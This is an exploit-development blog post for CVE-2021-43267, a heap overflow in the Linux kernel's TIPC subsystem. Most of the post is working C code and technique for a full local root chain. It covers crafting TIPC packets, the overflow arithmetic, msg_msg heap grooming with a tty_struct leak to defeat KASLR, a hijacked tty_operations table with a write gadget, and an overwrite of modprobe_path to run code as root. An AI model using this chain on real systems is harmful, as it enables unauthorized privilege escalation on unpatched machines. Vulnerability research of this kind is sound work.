Exploiting CVE-2021-43267


A couple of weeks ago a heap overflow vulnerability in the TIPC subsystem of the Linux kernel was disclosed by Max van Amerongen (@maxpl0it). He posted a detailed write up about the bug on the SentinelLabs website.

It’s a pretty clear cut heap buffer overflow where we control the size and data of the overflow. I decided I wanted to embark on a small exploit development adventure to see how hard it would be to exploit this bug on a kernel with common mitigations in place (SMEP/SMAP/KASLR/KPTI).

If you came here to find novel new kernel exploitation strategies, you picked the wrong blogpost, sorry!


To quote the TIPC webpage:

Have you ever wished you had the convenience of Unix Domain Sockets even when transmitting data between cluster nodes? Where you yourself determine the addresses you want to bind to and use? Where you don’t have to perform DNS lookups and worry about IP addresses? Where you don’t have to start timers to monitor the continuous existence of peer sockets? And yet without the downsides of that socket type, such as the risk of lingering inodes?

Well.. I have not. But then again, I’m just an opportunistic vulndev person.

Welcome to the Transparent Inter Process Communication service, TIPC in short, which gives you all of this, and a lot more.

Thanks for having me.

How to tipc-over-udp?

In order to use the TIPC support provided by the Linux kernel you’ll have to compile a kernel with TIPC enabled, or load the TIPC module which ships with many popular distributions. To easily interface with the TIPC subsystem you can use the tipc utility which is part of iproute2.

For example, to list all the node links you can issue tipc link list. We want to talk to the TIPC subsystem over UDP, and for that we’ll have to enable the UDP bearer media. This can be done using tipc bearer enable media udp name <NAME> localip <SOMELOCALIP>.

Under the hood the tipc userland utility uses netlink messages (generic netlink, family TIPCv2) to do its thing. Interestingly enough, these netlink messages can be sent by any unprivileged user. So even if there’s no existing TIPC configuration in place, this bug can still be exploited.

How to reach the vulnerable code path?

So now we know how to enable the UDP listener for TIPC, how do we go about actually reaching the vulnerable code? We’ll have to present ourselves as a valid node and establish a link before we can trigger the MSG_CRYPTO code path. We can find a protocol specification on the TIPC webpage that details everything about transport, addressing schemes, fragmentation and so on.

That’s a lot of really dry stuff though. I made some PCAPs of a tipc-over-udp session setup and with some hand-waving and reading the kernel source narrowed it down to a few packets we need to emit before we can start sending the messages we are interested in.

In short, a typical TIPC datagram starts with a header that consists of at least six 32bit words in big endian byte order. Those are typically referred to as w0 through w5. This header is (optionally) followed by a payload. w0 encodes the TIPC version, header size, payload size and the message ‘protocol’. There’s also a flag which indicates whether this is a sequential message or not.

w1 encodes (among other things) a protocol message type specific to the protocol.

The header also specifies a node_id in w3 which is a unique identifier a node includes in every packet. Typically, nodes encode their IPv4 address to be their node_id.

A quick way to learn about the various bit fields of the header format is by consulting net/tipc/msg.h.
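To make the w0 layout a bit more concrete, here is a minimal sketch of packing that word. The bit positions and constants are my reading of net/tipc/msg.h and should be treated as assumptions to verify against your own tree. Note that the size field there appears to hold the total message size (header plus payload), from which the payload size is derived. The helper names tipc_pack_w0 and tipc_w0_wire are made up for this example.

```c
#include <assert.h>
#include <stdint.h>
#include <arpa/inet.h>  /* htonl */

/* Assumed values, as read from net/tipc/msg.h; verify against your tree. */
#define TIPC_VERSION   2u
#define LINK_PROTOCOL  7u
#define LINK_CONFIG   13u
#define MSG_CRYPTO    14u

/*
 * Build w0 in host byte order (assumed layout):
 *   bits 31..29  version
 *   bits 28..25  user (the message 'protocol')
 *   bits 24..21  header size in 32-bit words
 *   bit  20      non-sequenced flag
 *   bits 16..0   message size in bytes
 */
uint32_t tipc_pack_w0(uint32_t user, uint32_t hdr_bytes,
                      uint32_t msg_bytes, int non_seq)
{
    assert(hdr_bytes % 4 == 0 && hdr_bytes / 4 <= 0xf);
    assert(user <= 0xf && msg_bytes <= 0x1ffff);

    return (TIPC_VERSION << 29) | (user << 25) | ((hdr_bytes / 4) << 21) |
           ((non_seq ? 1u : 0u) << 20) | msg_bytes;
}

/* The same word as it goes on the wire (big endian). */
uint32_t tipc_w0_wire(uint32_t user, uint32_t hdr_bytes,
                      uint32_t msg_bytes, int non_seq)
{
    return htonl(tipc_pack_w0(user, hdr_bytes, msg_bytes, non_seq));
}
```

For example, tipc_pack_w0(MSG_CRYPTO, 24, 64, 0) describes a six-word header followed by 40 bytes of payload.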

To establish a valid node link we send three packets:

protocol: LINK_CONFIG   -> message type: DSC_REQ_MSG
protocol: LINK_PROTOCOL -> message type: RESET_MSG
protocol: LINK_PROTOCOL -> message type: STATE_MSG

The LINK_CONFIG packet will advertise ourselves. The link is then reset with the LINK_PROTOCOL packet that has the RESET_MSG message type. Finally, the link is brought up by sending a LINK_PROTOCOL packet with the STATE_MSG message type.
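The three-packet sequence can be written down as a small table. This is only a sketch: the numeric constants are what I believe net/tipc/msg.h defines, the position of the message type in w1 (top three bits) is likewise an assumption, and the struct and helper names are invented for illustration. A real packet needs the remaining header words filled in too.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Assumed constants from net/tipc/msg.h; verify against your tree. */
enum { LINK_PROTOCOL = 7, LINK_CONFIG = 13 };   /* 'protocol' in w0 */
enum { DSC_REQ_MSG = 0 };                       /* LINK_CONFIG types */
enum { STATE_MSG = 0, RESET_MSG = 1 };          /* LINK_PROTOCOL types */

struct handshake_step {
    const char *what;
    uint32_t user;      /* 'protocol' field in w0 */
    uint32_t msg_type;  /* message type field in w1 */
};

/* The packets we emit, in order, before MSG_CRYPTO becomes reachable. */
const struct handshake_step handshake[] = {
    { "advertise ourselves", LINK_CONFIG,   DSC_REQ_MSG },
    { "reset the link",      LINK_PROTOCOL, RESET_MSG   },
    { "bring the link up",   LINK_PROTOCOL, STATE_MSG   },
};
const size_t handshake_len = sizeof(handshake) / sizeof(handshake[0]);

/* Assumed: the message type sits in the top three bits of w1 (host order). */
uint32_t tipc_pack_w1_type(uint32_t msg_type)
{
    assert(msg_type <= 7);
    return msg_type << 29;
}
```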

Now we are actually in a state where we can send MSG_CRYPTO TIPC packets and start playing with the heap overflow bug.

Corrupting some memories

A MSG_CRYPTO TIPC packet payload looks like this:

struct tipc_aead_key {
    char alg_name[TIPC_AEAD_ALG_NAME];
    unsigned int keylen;
    char key[];
};

As detailed in the SentinelLabs write up, the length of the kmalloc’d heap buffer is determined by taking the payload size from the TIPC packet header, after which the key is memcpy’d into this buffer with the length specified in the MSG_CRYPTO structure. Nothing checks that these two lengths agree.

At first you’d think that means the overflow uses uncontrolled data.. but you can send TIPC packets that lie about the actual length of the payload (by making tipc_hdr.payload_size smaller than the actual payload size). This passes all the checks and reaches the memcpy without the remainder of the payload being discarded, giving us full control over the overflowed data. Great!

The payload size from the header is passed to kmalloc directly, and keylen is passed to memcpy without being checked against it.
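To put the mismatch in numbers, here is a small userland sketch that computes how many bytes end up past the allocation for a given pair of lengths. It assumes TIPC_AEAD_ALG_NAME is 32 (as in the uapi header, to my knowledge) and that the copy starts at the key member. overflow_bytes is a hypothetical helper, not kernel code.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define TIPC_AEAD_ALG_NAME 32   /* assumed value from the uapi header */

struct tipc_aead_key {
    char alg_name[TIPC_AEAD_ALG_NAME];
    unsigned int keylen;
    char key[];
};

/*
 * alloc_size: payload size claimed in the TIPC header (what gets allocated).
 * keylen:     length field inside the MSG_CRYPTO payload (what gets copied).
 * Returns how many bytes land past the end of the allocation.
 */
size_t overflow_bytes(size_t alloc_size, uint32_t keylen)
{
    size_t needed = offsetof(struct tipc_aead_key, key) + (size_t)keylen;

    /* Precondition of this helper only, not a check the kernel performs. */
    assert(alloc_size >= offsetof(struct tipc_aead_key, key));
    return needed > alloc_size ? needed - alloc_size : 0;
}
```

With a claimed payload of 64 bytes and a keylen of 128, the copy runs 100 bytes past the end of the buffer.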

Smaller (up to 8KiB) heap objects allocated by the kernel using kmalloc end up in caches that are grouped by size (powers of two). You can have a peep at /proc/slabinfo and look at the entries prefixed by kmalloc- to get an overview of the general purpose object cache sizes.

Since we can control the size of the heap buffer that will be allocated and overflowed, we can pick in which of these caches our object ends up. This is a great ability, as it allows us to overflow into adjacent kernel objects of a similar size!
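Picking a cache boils down to rounding the allocation size up. The sketch below follows the power-of-two description above and deliberately ignores the kmalloc-96 and kmalloc-192 caches that many kernels also have. kmalloc_cache_size is an illustrative helper name.

```c
#include <assert.h>
#include <stddef.h>

/*
 * Returns the object size of the kmalloc-N cache a request of n bytes
 * would land in, or 0 if it is larger than the 8KiB covered here.
 * Simplification: only power-of-two caches are modelled.
 */
size_t kmalloc_cache_size(size_t n)
{
    size_t cache = 8;   /* smallest general purpose cache */

    assert(n > 0);
    while (cache < n)
        cache <<= 1;
    return cache <= 8192 ? cache : 0;
}
```

So to sit next to objects from kmalloc-1024, the claimed payload size has to fall between 513 and 1024 bytes.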

Defeating KASLR

If we want to do any kind of control flow hijacking we’re going to need an information leak to disclose (at least) some kernel text/data addresses so we can deduce the randomized base address.

It would be great if we could find some kernel objects that contain a pointer/offset/length field early on in their structure, and that can be made to return data back to userland somehow.

While googling I stumbled on this cool paper by some Pennsylvania State University students who dubbed objects with such properties “Elastic Objects”. Their research on the subject is quite exhaustive and covers Linux, BSD and XNU.. I definitely recommend checking it out.

Since we can pick arbitrarily sized allocations, we’re free to target any convenient elastic object. I went with msg_msg, which is a popular choice amongst fellow exploitdevs. ;-)

The structure of a msg_msg as defined in include/linux/msg.h:

/* one msg_msg structure for each message */
struct msg_msg {
	struct list_head m_list;
	long m_type;
	size_t m_ts;		/* message text size */
	struct msg_msgseg *next;
	void *security;
	/* the actual message follows immediately */
};

You can easily allocate msg_msg objects using the msgsnd system call. And they can be freed again using the msgrcv system call. These system calls are not to be confused with the sendmsg and recvmsg system calls btw, great naming scheme!

If we corrupt the m_ts field of a msg_msg object we can extend its size and get a relative kernel heap out-of-bounds read back to userland when retrieving the message from the queue again using the msgrcv system call.

A small problem with this is that overwriting the m_ts field also requires trampling over the struct list_head members (a prev/next pointer). When msgrcv is called and a matching message is found, it wants to unlink it from the linked list.. but since we’re still in the information leak stage of the exploit, we can’t put any legitimate/meaningful pointers in there. Luckily, there’s a flag you can pass to msgrcv called MSG_COPY, which will make a copy of the message and not unlink the original one, avoiding a bad pointer dereference.
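A minimal sketch of the msg_msg primitives used here: allocate, peek with MSG_COPY, and free. The helper names are mine. The 48-byte header size is an assumption for x86_64, MSG_COPY is defined by hand in case the libc headers do not expose it, and it only works on kernels built with CONFIG_CHECKPOINT_RESTORE. With MSG_COPY the type argument is a position in the queue, and IPC_NOWAIT is mandatory.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <string.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/types.h>

#ifndef MSG_COPY
#define MSG_COPY 040000
#endif

#define MSG_MSG_HDR 48      /* assumed sizeof(struct msg_msg) on x86_64 */
#define BODY_MAX    4096

struct user_msg {
    long mtype;
    char mtext[BODY_MAX];
};

int queue_create(void)
{
    return msgget(IPC_PRIVATE, IPC_CREAT | 0600);
}

/* Allocate one msg_msg; the kernel object is MSG_MSG_HDR + len bytes. */
int queue_send(int qid, const void *body, size_t len)
{
    struct user_msg m = { .mtype = 1 };

    assert(len <= BODY_MAX);
    memcpy(m.mtext, body, len);
    return msgsnd(qid, &m, len, 0);
}

/* Copy message number idx out of the queue without unlinking it. */
ssize_t queue_peek(int qid, long idx, void *out, size_t len)
{
    struct user_msg m;
    ssize_t n;

    assert(len <= BODY_MAX);
    n = msgrcv(qid, &m, len, idx, MSG_COPY | IPC_NOWAIT);
    if (n >= 0)
        memcpy(out, m.mtext, (size_t)n);
    return n;
}

/* Regular receive: unlinks the message and frees the msg_msg. */
ssize_t queue_recv(int qid, void *out, size_t len)
{
    struct user_msg m;
    ssize_t n;

    assert(len <= BODY_MAX);
    n = msgrcv(qid, &m, len, 0, IPC_NOWAIT);
    if (n >= 0)
        memcpy(out, m.mtext, (size_t)n);
    return n;
}
```

To land a msg_msg in kmalloc-1024 you would send a body of 1024 - MSG_MSG_HDR bytes. When peeking at a corrupted message, pass a len at least as large as the fake m_ts, otherwise the copy is refused.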

So the basic strategy is to line up three objects like this:

[ msg_msg ] [ msg_msg ] [ some_interesting_object ]


and proceed to free the first msg_msg object and allocate the MSG_CRYPTO key buffer into the hole it left behind. We corrupt the adjacent msg_msg using the buffer overflow and subsequently leak data from some_interesting_object using the msgrcv system call with the MSG_COPY flag set.

I chose to leak the data of tty_struct, which can easily be allocated by opening /dev/ptmx with open(). This tty_struct holds all kinds of state related to the tty, and starts off like this:

struct tty_struct {
    int magic;
    struct kref kref;
    struct device *dev; /* class device or NULL (e.g. ptys, serdev) */
    struct tty_driver *driver;
    const struct tty_operations *ops;
    int index;
    /* ... */
};

A nice feature of this structure is the magic at the very start: it allows us to easily confirm the validity of our leak by comparing it against the expected value TTY_MAGIC (0x5401). A few members later we find struct tty_operations *ops, which points to a table of function pointers associated with various operations. This table lives somewhere in kernel .data, and thus we can use its address to defeat KASLR!

Depending on whether the tty_struct being leaked belongs to a master pty or slave pty (they are allocated in pairs) we’ll end up finding the address of ptm_unix98_ops or pty_unix98_ops.

As an added bonus, leaking tty_struct also allows us to figure out the address of the tty_struct because tty_struct.ldisc_sem.read_wait.next points to itself!
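Scanning the leaked bytes for a tty_struct could look roughly like this. The ops offset of 24 assumes the x86_64 layout of the excerpt above (4-byte magic, 4-byte kref, two pointers). The function names and the addresses in the usage note are made up, and the unslid address of ptm_unix98_ops or pty_unix98_ops has to come from your own vmlinux.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define TTY_MAGIC      0x5401
#define TTY_OPS_OFFSET 24   /* assumed: magic(4) + kref(4) + dev(8) + driver(8) */

/* Returns the offset of the first plausible tty_struct in the leak, or -1. */
long find_tty_struct(const uint8_t *leak, size_t len)
{
    for (size_t off = 0; off + TTY_OPS_OFFSET + 8 <= len; off += 8) {
        int32_t magic;
        uint64_t ops;

        memcpy(&magic, leak + off, sizeof(magic));
        memcpy(&ops, leak + off + TTY_OPS_OFFSET, sizeof(ops));
        /* The ops pointer must look like a kernel image address. */
        if (magic == TTY_MAGIC && ops >= 0xffffffff80000000ull)
            return (long)off;
    }
    return -1;
}

/* Read the leaked ops pointer of the tty_struct found at offset off. */
uint64_t leaked_ops(const uint8_t *leak, long off)
{
    uint64_t ops;

    assert(off >= 0);
    memcpy(&ops, leak + off + TTY_OPS_OFFSET, sizeof(ops));
    return ops;
}

/* Slide = leaked address - address of the same symbol in the unslid vmlinux. */
uint64_t kaslr_slide(uint64_t leaked, uint64_t unslid)
{
    assert(leaked >= unslid);
    return leaked - unslid;
}
```

If the leak yields 0xffffffff9a2a1b40 and the symbol sits at 0xffffffff822a1b40 in vmlinux (both values invented), the slide is 0x18000000 and every other kernel symbol can be rebased by adding it.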

Getting $RIP (or panic tryin’)

Naturally, the tty_operations pointer is a nice target for overwriting to hijack the kernel execution flow. So in the next stage of the exploit we start by spraying a bunch of copies of a fake tty_operations table. We can accurately guesstimate the address of one of these sprayed copies by utilizing the heap pointer we leaked in the previous step.

Now we repeatedly: allocate msg_msg, allocate tty_struct(s), free msg_msg, trigger TIPC bug to (hopefully) overflow into a tty_struct. To confirm we actually overwrote (the first part of) a tty_struct we invoke ioctl on the fd we got from opening /dev/ptmx. This will call tty_struct.ops.ioctl and should get us control over $RIP if we managed to hijack the ops pointer of this object. If that’s not the case, we close() the pty again to not exhaust resources.

Avoiding ROP (mostly)

Where to jump to in the kernel? We could set up a ROP stack somewhere and pivot the stack into it.. but this can get messy quick, especially once you need to do cleanup and resume the kernel thread like nothing ever happened.

If we look at the prototype of the ioctl callback from the ops list, we see:

int (*ioctl)(struct tty_struct *tty, unsigned int cmd, unsigned long arg);

We can set both cmd and arg from the userland invocation easily!

So effectively we have an arbitrary function call where we control the 2nd and 3rd argument (RSI and RDX respectively). Well, cmd is actually truncated to 32bit, but that’s good enough.

Let’s try to look for some gadget sequence that allows us to do an arbitrary write:

$ objdump -D -j .text ./vmlinux \
    | grep -C1 'mov    %rsi,(%rdx)' \
    | grep -B2 ret
ffffffff812c51f5:       31 c0                   xor    %eax,%eax
ffffffff812c51f7:       48 89 32                mov    %rsi,(%rdx)
ffffffff812c51fa:       c3                      ret

This one is convenient, it also clears rax so the exploit can tell whether the invocation was a success. We now have some arbitrary 64bit write gadget! (For some definition of arbitrary, the value is always 32bit controlled + 32bit zeroes, but whatever)
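Because every gadget call stores eight bytes of which only the low four are ours, writing a longer value (a path string, say) means stepping through it four bytes at a time at ascending addresses, so that each write's zero half is overwritten by the next one. A sketch of that planning step, with a userland stand-in for the gadget so it can be checked; all names are hypothetical and a little endian host is assumed.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

struct write_op {
    uint64_t addr;   /* passed as arg -> RDX */
    uint32_t value;  /* passed as cmd -> RSI, zero-extended */
};

/*
 * Split a NUL-terminated string into 4-byte steps at ascending addresses.
 * The last write supplies the terminator plus some trailing zeroes.
 * Returns the number of ops, or 0 if max is too small.
 */
size_t plan_string_write(uint64_t dst, const char *s,
                         struct write_op *ops, size_t max)
{
    size_t len = strlen(s) + 1;          /* include the NUL */
    size_t n = (len + 3) / 4;

    if (n > max)
        return 0;
    for (size_t i = 0; i < n; i++) {
        size_t left = len - i * 4;
        uint32_t v = 0;

        memcpy(&v, s + i * 4, left < 4 ? left : 4);
        ops[i].addr = dst + i * 4;
        ops[i].value = v;
    }
    return n;
}

/* Userland stand-in for the gadget: mov %rsi,(%rdx) with rsi = (u64)value. */
void apply_write(uint8_t *mem, uint64_t base, const struct write_op *op)
{
    uint64_t v = op->value;

    assert(op->addr >= base);
    memcpy(mem + (op->addr - base), &v, sizeof(v));
}
```

In the exploit each write_op would become one ioctl(fd, op.value, op.addr) on the hijacked pty. Keep in mind that the final write clobbers a few bytes past the end of the string.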

Meet my friend: modprobe_path

Okay, we have this scuffed arbitrary write gadget we can repeatedly invoke, what do we overwrite? Classic kernel exploits would target the cred structure of the current task to elevate the privileges to uid0. We could of course build an arbitrary read mechanism in the same way we built the arbitrary write.. but let’s try something else.

There are various scenarios in which the kernel will spawn a userland process (using the usermode_helper infrastructure in the kernel) to load additional kernel modules when it thinks that is necessary. The process spawned to load these modules is, of course: modprobe. The path to the modprobe binary is stored in a global variable called modprobe_path and this can be set by a privileged user through the sysctl node /proc/sys/kernel/modprobe.

This is a perfect candidate for overwriting using our write gadget. If we overwrite this path and convince the kernel we need some additional module support we can invoke any executable as root!

One of these modprobe scenarios is when you try to run a binary that has no known magic. In fs/exec.c we see:

/* cycle the list of binary formats handler, until one recognizes the image */
static int search_binary_handler(struct linux_binprm *bprm)
{
	/* ... */
	if (request_module("binfmt-%04x", *(ushort *)(bprm->buf + 2)) < 0)
		return retval;
}

request_module ends up invoking call_modprobe which spawns a modprobe process based on the path from modprobe_path.
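Triggering that path from userland only takes a file with an unrecognized header and an attempt to execute it. A minimal sketch follows. The helper names and the file path in the usage note are placeholders, and the choice of 0xff bytes assumes that non-printable leading bytes are what gets the kernel to ask for a binfmt module.

```c
#include <assert.h>
#include <fcntl.h>
#include <stddef.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Create an executable file whose first four bytes match no binary format. */
int make_unknown_binary(const char *path)
{
    static const unsigned char magic[4] = { 0xff, 0xff, 0xff, 0xff };
    int fd;

    assert(path != NULL);
    fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0755);
    if (fd < 0)
        return -1;
    if (write(fd, magic, sizeof(magic)) != (ssize_t)sizeof(magic) ||
        fchmod(fd, 0755) < 0) {
        close(fd);
        return -1;
    }
    return close(fd);
}

/*
 * Try to execute the file in a child process. The exec itself is expected
 * to fail; we only care about the kernel's attempt to load a handler.
 */
int trigger_modprobe(const char *path)
{
    char *const argv[] = { (char *)path, NULL };
    pid_t pid = fork();

    if (pid < 0)
        return -1;
    if (pid == 0) {
        execv(path, argv);
        _exit(127);
    }
    return waitpid(pid, NULL, 0) == pid ? 0 : -1;
}
```

After overwriting modprobe_path with the path of a script we control, calling make_unknown_binary("/tmp/trigger") followed by trigger_modprobe("/tmp/trigger") should cause that script to run as root.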

Closing Words

I hope you enjoyed the read. Feel free to reach out with feedback or to point out any inaccuracies. The full exploit code can be found here.

A successful run of the exploit should look something like this:

PoC in action